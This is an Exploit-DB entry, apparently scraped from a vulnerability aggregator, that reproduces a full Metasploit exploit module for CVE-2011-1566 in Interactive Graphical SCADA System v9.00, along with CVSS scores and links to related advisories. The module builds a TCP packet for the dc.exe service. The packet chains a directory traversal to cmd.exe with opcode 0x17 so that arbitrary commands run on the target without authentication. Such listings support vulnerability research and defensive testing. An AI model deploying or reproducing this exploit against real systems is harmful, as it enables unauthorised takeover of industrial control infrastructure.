Lucene search
MetasploitEDB-ID:29129HistoryOct 22, 2013 - 12:00 a.m.
Interactive Graphical SCADA System - Remote Command Injection (Metasploit)
2013-10-2200:00:00
Metasploit
www.exploit-db.com
15
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7.4
Confidence
Low
EPSS
0.879
Percentile
98.7%
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
'Description' => %q{
This module abuses a directory traversal flaw in Interactive
Graphical SCADA System v9.00. In conjunction with the traversal
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
may be able to execute arbitrary system commands.
},
'Author' =>
[
'Luigi Auriemma',
'MC'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 153,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows', {} ]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Mar 21 2011'))
register_options(
[
Opt::RPORT(12397)
], self.class)
end
def exploit
print_status("Sending exploit packet...")
connect
packet = [0x00000100].pack('V') + [0x00000000].pack('V')
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V')
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
packet << "\x00" * (143) #
sock.put(packet)
sock.get_once(-1,0.5)
disconnect
end
endRelated
openvas
openvas
zdt
zdt
Interactive Graphical SCADA System Remote Command Injection
2013-10-22 00:00:00
cve
cve
CVE-2011-1566
2011-04-05 15:19:36
packetstorm
packetstorm
Interactive Graphical SCADA System Remote Command Injection
2013-10-22 00:00:00
nvd
nvd
CVE-2011-1566
2011-04-05 15:19:36
checkpoint_advisories
checkpoint_advisories
metasploit
metasploit
Interactive Graphical SCADA System Remote Command Injection
2013-10-17 19:07:27
7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
2011-05-30 21:00:49
cvelist
cvelist
CVE-2011-1566
2011-04-05 15:00:00
prion
prion
Directory traversal
2011-04-05 15:19:00
saint
saint
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
exploitdb
exploitdb
7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities
2011-03-22 00:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7.4
Confidence
Low
EPSS
0.879
Percentile
98.7%
Related for EDB-ID:29129